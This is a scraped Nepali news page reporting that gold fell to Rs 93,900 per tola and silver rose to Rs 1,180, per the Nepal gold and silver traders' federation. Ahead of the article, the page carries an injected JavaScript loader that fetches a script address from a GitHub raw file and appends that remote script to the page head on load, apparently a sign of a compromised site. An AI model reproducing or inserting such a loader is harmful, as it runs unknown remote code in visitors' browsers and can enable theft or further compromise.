;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सुनको भाउ आज तोलाको ९३ हजार ९ सय रुपैयाँ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सुनको भाउ आज तोलाको ९३ हजार ९ सय रुपैयाँ
समाचार

सुनको भाउ आज तोलाको ९३ हजार ९ सय रुपैयाँ

असोज २२,
काठमाण्डौँ । सुनको भाउ आज तोलाको ९३ हजार ९ सय रुपैयाँमा झरेको छ ।

बुधबार तोलामा ९४ हजार १ थियो भने आज तोलामा २ सय रुपैयाँ घटेर सुनको भाउ तोलाको ९३ हजार ९ सय रुपैयाँ निर्धारण गरिएको नेपाल सुनचाँदि व्यावसायी महासङघले जनाएको छ । सुनको भाउ घटे पनि चाँदिको भाउ आज बढेको छ ।

चाँदि आज तोलामा ५ रुपैयाँ बढेर तोलाको ११ सय ८० रुपैयाँमा कारोबार भइरहेको महसङघले जनाएको छ ।

फेसबुक प्रतिक्रियाहरु